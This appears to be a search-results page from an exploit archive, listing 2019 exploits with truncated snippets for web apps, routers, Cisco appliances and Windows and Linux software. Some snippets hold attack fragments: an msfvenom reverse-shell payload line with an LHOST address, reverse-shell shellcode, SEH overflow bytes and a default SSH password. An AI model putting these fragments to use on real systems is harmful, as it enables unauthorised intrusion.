39001 matches found
Inventory Webapp - (itemquery) SQL injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Inventory Webapp SQL injection Date: 05.09.2019 Exploit Author: mohammad zaheri Vendor Homepage: https://github.com/edlangley/inventory-webapp Tested on: Windows Google Dork: N/A ========= Vulnerable Page: =========...
Linux/x86 TCP Reverse Shell 127.0.0.1 Nullbyte Free Shellcode
/ ; name : Exploit Title: Linux/x86 - TCP reverse shell 127.0.0.1 nullbyte free ; date : 04th sept, 2019 ; author : Sandro "guly" Zaccarini ; twitter : @theguly ; blog : https://gulyslae.github.io/ ; SLAE32 : SLAE-1037 ; purpose : the program will create a new connection to 127.0.0.1:4444 and...
FusionPBX 4.4.8 - Remote Code Execution Exploit
!/usr/bin/python3 ''' Exploit Title: FusionPBX v4.4.8 Remote Code Execution Exploit Author: Askar @mohammadaskar2 CVE : 2019-15029 Vendor Homepage: https://www.fusionpbx.com Software link: https://www.fusionpbx.com/download Version: v4.4.8 Tested on: Ubuntu 18.04 / PHP 7.2 ''' import requests fro...
Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) And Registry Exploit
This Metasploit module exploits a flaw in the WSReset.exe file associated with the Windows Store. This binary has autoelevate privs, and it will run a binary file contained in a low-privilege registry location. By placing a link to the binary in the registry location, WSReset.exe will launch the...
FileThingie 2.5.7 - Arbitrary File Upload Vulnerability
Exploit for php platform in category web applications Exploit Title: FileThingie 2.5.7 - Arbitrary File Upload Author: Cakes Vendor Homepage: www.solitude.dk/filethingie Software Link: https://github.com/leefish/filethingie/archive/master.zip Tested Version: 2.5.7 Tested on OS: CentOS 7 CVE: N/A...
AwindInc SNMP Service - Command Injection Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "AwindInc SNMP Service Command Injection", 'Description' = %q This module exploits a vulnerability found in AwindInc and OEM'ed products where...
WordPress Spryng Payments WooCommerce 1.6.7 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications WordPress Spryng Payments WooCommerce 1.6.7 Cross Site Scripting Vulnerability Class Input Validation Error Remote Yes Credit Ricardo Sanchez Vulnerable Spryng payments woocommerce 1.6.7 Spryng payments woocommerce is prone to a reflected...
WordPress API Bearer Auth 20181229 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications WordPress API Bearer Auth 20181229 Cross Site Scripting Vulnerability Class Input Validation Error Remote Yes Credit Ricardo Sanchez Vulnerable Api bearer auth 20181229 Api bearer auth is prone to a reflected cross-site scripting vulnerability...
DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting Vulnerabilities
Exploit for hardware platform in category web applications Multiple Cross-Site Scripting XSS in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of unsanitized GET parameters. Exploit Titl...
WordPress Download Manager 2.9.93 Plugin - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: WordPress Download Manager Cross-site Scripting Exploit Author: ThuraMoeMyint Author Link: https://twitter.com/mgthuramoemyint Vendor Homepage: https://www.wpdownloadmanager.com Software Link:...
WordPress Portrait-Archiv.com Photostore 5.0.4 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications WordPress Portrait-Archiv.com Photostore 5.0.4 Cross Site Scripting Vulnerability Class Input Validation Error Remote Yes Credit Ricardo Sanchez Vulnerable Portrait-Archiv.com Photostore 5.0.4 Portrait-Archiv.com is prone to a reflected...
Craft CMS 2.7.9/3.2.5 - Information Disclosure Vulnerability
Exploit for php platform in category web applications Exploit Title : CraftCms Users information disclosure From uploaded File Author Discovered By : Mohammed Abdul Raheem Author's Company Name : TrekShield IT Solution Vendor Homepage:https://craftcms.com/ Software Information Link:...
Microsoft Outlook Web Access Build 15.1.1591 Header Injection Exploit
Exploit for windows platform in category web applications !/usr/bin/perl -w Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit Copyright 2019 c Todor Donev Disclaimer: This or previous programs are for Educational purpose ONLY. Do not use it without permission. Th...
Cisco Data Center Network Manager Unauthenticated Remote Code Execution Exploit
DCNM exposes a file upload servlet FileUploadServlet at /fm/fileUpload. An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps directory and achieve remote code execution as root. This module exploits two other vulnerabilities, CVE-2019-1619 for authentication...
IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 - Arbitrary File Read Exploit
!/usr/bin/perl -w IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read Todor Donev 2019 c Disclaimer: This or previous programs are for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact...
Cisco Email Security Appliance (IronPort) C160 - (Host) Header Injection Exploit
!/usr/bin/perl -w Cisco Titsco Email Security Appliance IronPort C160 Header 'Host' Injection Copyright 2019 c Todor Donev Disclaimer: This or previous programs are for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev i...
ktsuss Suid Privilege Escalation Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ktsuss suid Privilege Escalation', 'Description' = %q This module attempts to gain root privileges by exploiting a vulnerability in ktsuss versio...
Cisco UCS Director Unauthenticated Remote Code Execution Exploit
The Cisco UCS Director virtual appliance contains two flaws that can be combined and abused by an attacker to achieve remote code execution as root. The first one, CVE-2019-1937, is an authentication bypass, that allows the attacker to authenticate as an administrator. The second one,...
Kaseya VSA agent 9.5 - Privilege Escalation Vulnerability
Exploit Title: Kaseya VSA agent CVE-2017-12410 found by Filip Palian. A fix was put in place for the original CVE, however it was specific to binaries and not scripts. The root cause for both issues is allowing a low privileged group excessive permissions to a folder used by an elevated process...
Webmin 1.920 rpc.cgi Remote Root Exploit
This Metasploit module exploits Webmin versions 1.930 and below. This exploit takes advantage of a code execution issue within the function unserialisevariable located in web-lib-funcs.pl, in order to gain root. The only prerequisite is a valid session id. This module requires Metasploit:...
ChaosPro 3.1 - SEH Buffer Overflow Exploit
!C:\Python27\python.exe Title : ChaosPro 3.1 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html our egg! payload = "T00WT00W" adjust the stack from 00F2FFA6 to 00F2FFA8 payload += "\x83\xC4\x02" the payload payload +=...
Alkacon OpenCMS 10.5.x - Cross-Site Scripting Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template Exploit Author: Aetsu Vendor Homepage: http://www.opencms.org Software Link: https://github.com/alkacon/apollo-template Version: 10.5.x Tested on: 10.5.5 / 10.5.4 CVE...
Alkacon OpenCMS 10.5.x - Local File inclusion Vulnerability
Exploit for multiple platform in category web applications Exploit Title: Alkacon OpenCMS 10.5.x - Multiple LFI in Alkacon OpenCms Site Management Exploit Author: Aetsu Vendor Homepage: http://www.opencms.org Software Link: https://github.com/alkacon/opencms-core Version: 10.5.x Tested on: 10.5.5...
Cisco Email Security Appliance (IronPort) C150 - (Host) Header Injection Exploit
!/usr/bin/perl -w Cisco IronPort C150 Remote Header 'Host' Injection Copyright 2019 c Todor Donev Disclaimer: This or previous programs are for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev is not liable for any...
ChaosPro 2.1 - SEH Buffer Overflow Exploit
!C:\Python27\python.exe Title : ChaosPro 2.1 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html our egg! payload = "T00WT00W" the payload payload += msfvenom -p windows/shellreversetcp LHOST=10.0.7.17 LPORT=4444 -e...
Opencart 3.x - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Opencart 3.x.x Authenticated Stored XSS Exploit Author: Nipun Somani Author Web: http://thehackerstore.net Vendor Homepage: https://www.opencart.com/ Software Link: https://github.com/opencart/opencart Version: 3.x.x Tested on:...
Wordpress Event Tickets 4.10.7.1 Plugin - CSV Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: WordPress Plugin Event Tickets = 4.10.7.1 - CSV Injection Google Dork: inurl:"\wp-content\plugins\event-tickets" Exploit Author: MTK http://mtk911.cf/ Vendor Homepage: https://tri.be/ Software Link:...
ChaosPro 2.0 - SEH Buffer Overflow Exploit
!C:\Python27\python.exe Title : ChaosPro 2.0 Twitter : @securitychops Blog Post : https://securitychops.com/2019/08/24/retro-exploit-series-episode-one-chaospro-3-1.html this needs to be a backwards jump to give us room to call stack jump code jmpback80 = "\x40\x75\x80\x75" jmpforward06 =...
Cisco RV110W / RV130(W) / RV215W Remote Command Execution Exploit
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The...
ptrace Sudo Token Privilege Escalation Exploit
This Metasploit module attempts to gain root privileges by blindly injecting into the session user's running shell processes and executing commands by calling system, in the hope that the process has valid cached sudo tokens with root privileges. The system must have gdb installed and permit...
Alkacon OpenCMS 10.5.x - Cross-Site Scripting Vulnerability (2)
Exploit for multiple platform in category web applications Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms Site Management Exploit Author: Aetsu Vendor Homepage: http://www.opencms.org Software Link: https://github.com/alkacon/opencms-core Version: 10.5.x Tested on: 10.5.5...
Cisco UCS Director Default scpuser Password Exploit
This Metasploit module abuses a known default password on Cisco UCS Director. The 'scpuser' has the password of 'scpuser', and allows an attacker to login to the virtual appliance via SSH. This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0. Note that Cisco also...
SQL Server Password Changer 1.90 - Denial of Service Exploit
Exploit Title: SQL Server Password Changer v1.90 Denial of Service Exploit Vendor Homepage:https://www.top-password.com/ Exploit Author: Velayutham Selvaraj & Praveen Thiyagarayam TwinTech Solutions Tested Version: v2.10 Tested on: Windows 8 x64 Windows 7 x64 1.- Run python code :Outlook Password...
PilusCart 1.4.1 - Local File Disclosure Vulnerability
Exploit for php platform in category web applications Exploit Title: PilusCart = 1.4.1 - Local File Disclosure Exploit Author: Damian Ebelties https://zerodays.lol/ Vendor Homepage: https://sourceforge.net/projects/pilus/ Version: = 1.4.1 Tested on: Ubuntu 18.04.1 The e-commerce software...
VX Search Enterprise 10.4.16 - (User-Agent) Denial of Service Exploit
Exploit Title: VX Search Enterprise v10.4.16 DoS Exploit Author: James Chamberlain chumb0 Vendor Homepage: http://www.vxsearch.com/downloads.html Software Link: http://www.vxsearch.com/setups/vxsearchentsetupv10.4.16.exe Version: v10.4.16 Tested on: Windows 7 Home x86 CVE : N/A Have been unable t...
Zyxel NWA/NAP/WAC Hardcoded Credentials Vulnerability
An FTP service runs on the Zyxel wireless access point that contains the configuration file for the WiFi network. This FTP server can be accessed with hard-coded credentials that are embedded in the firmware of the AP. When the WiFi network is bound to another VLAN, an attacker can cross the...
Canon PRINT 2.5.5 - Information Disclosure Exploit
Exploit Title: Content Provider URI Injection on Canon PRINT 2.5.5 CVE-2019-14339 Date: 24th July, 2019 Exploit Author: 0x48piraj Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home/explore/printing-innovations/mobile-printing/canon-print-app Software Link:...
YouPHPTube 7.4 - Remote Code Execution Vulnerability
Exploit for php platform in category web applications Exploit Title: YouPHPTube &webSiteTitle=Zerodays.lol&databaseHost=&databaseName=&databasePass=&databasePort=&databaseUser=" 0day.today 2019-12-04...
Zyxel USG/UAG/ATP/VPN/NXC External DNS Requests Vulnerability
Zyxel USG/UAG/ATP/VPN/NXC series suffer from an issue where a DNS request can be made by an unauthenticated attacker to either spam a DNS service of a third party with requests that have a spoofed origin or probe whether domain names are present on the internal network behind the firewall...
GGPowerShell / Windows PowerShell Remote Command Execution Exploit
This python script mints a .ps file with an exploitable semicolon condition that allows for command execution from Microsoft Windows PowerShell. from base64 import b64encode from base64 import b64decode from socket import import argparse,sys,socket,struct,re GGPowerShell Microsoft Windows...
Asus Precision TouchPad 11.0.0.25 - Denial of Service Exploit
!/usr/bin/python Exploit Title: Asus Precision TouchPad 11.0.0.25 - DoS/Privesc Exploit Author: Athanasios Tserpelis of Telspace Systems Vendor Homepage: https://www.asus.com Version: 11.0.0.25 Software Link : https://www.asus.com Contact: [email protected] Twitter: @telspacesystems Greets ...
Sentrifugo 3.2 - File Upload Restriction Bypass Vulnerability
Exploit for php platform in category web applications Exploit Title: Sentrifugo 3.2 - File Upload Restriction Bypass Exploit Author: creosote Vendor Homepage: http://www.sentrifugo.com/ Version: 3.2 Tested on: Ubuntu 18.04 CVE : CVE-2019-15813 Multiple File Upload Restriction Bypass vulnerabiliti...
WordPress WooCommerce Product Feed 2.2.18 Plugin - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: WordPress Plugin WooCommerce Product Feed = 2.2.18 - Cross-Site Scripting Exploit Author: Damian Ebelties https://zerodays.lol/ Vendor Homepage: https://wordpress.org/plugins/webappick-product-feed-for-woocommerce/ Version: =...
QEMU - Denial of Service Exploit
include include include include include include include include include include include include include include include include include define diex do \ perrorx; \ exitEXITFAILURE; \ while0; // Constans define SRCADDR "10.0.2.15" define DSTADDR "10.0.2.2" define INTERFACE "ens3" define ETHHDRLEN ...
DomainMod 4.13 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: DomainMod = 4.13 - Cross-Site Scripting Exploit Author: Damian Ebelties https://zerodays.lol/ Vendor Homepage: https://domainmod.org/ Version: = 4.13 Tested on: Ubuntu 18.04.1 CVE: CVE-2019-15811 The software 'DomainMOD' is...
Easy MP3 Downloader 4.7.8.8 - (Unlock Code) Denial of Service Exploit
!/usr/bin/python SWAMI KARUPASAMI THUNAI print""" Exploit Title: Easy MP3 Downloader Denial of Service Date: 2019-08-29 Exploit Author: Mohan Ravichandran & Snazzy Sanoj Organization : StrongBox IT Vulnerable Software: Easy MP3 Downloader Version: 4.7.8.8 Software Link:...
Sentrifugo 3.2 - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Sentrifugo 3.2 - Persistent Cross-Site Scripting Exploit Author: creosote Vendor Homepage: http://www.sentrifugo.com/ Version: 3.2 Tested on: Ubuntu 18.04 CVE : CVE-2019-15814 Multiple Stored XSS vulnerabilities were found in...
WordPress GoURL.io Plugin < 1.4.14 - File Upload Exploit
Exploit for php platform in category web applications Shell link 0day.today 2019-12-04...
Jobberbase 2.0 - (subscribe) SQL Injection Exploit
Exploit for php platform in category web applications !/bin/bash Exploit Title: Jobberbase 2.0 - 'subscribe' SQL injection Exploit Author: Damian Ebelties https://zerodays.lol/ Vendor Homepage: http://www.jobberbase.com/ Version: 2.0 Tested on: Ubuntu 18.04.1 : ' The page "/subscribe/" is...
Webkit JSC: JIT - Uninitialized Variable Access in ArgumentsEliminationPhase::transform Exploit
https://github.com/WebKit/webkit/blob/94e868c940d46c5745869192d07255331d00102b/Source/JavaScriptCore/dfg/DFGArgumentsEliminationPhase.cppL743 case GetByVal: ... unsigned numberOfArgumentsToSkip = 0; if candidate-op == PhantomCreateRest numberOfArgumentsToSkip = candidate-numberOfArgumentsToSkip;...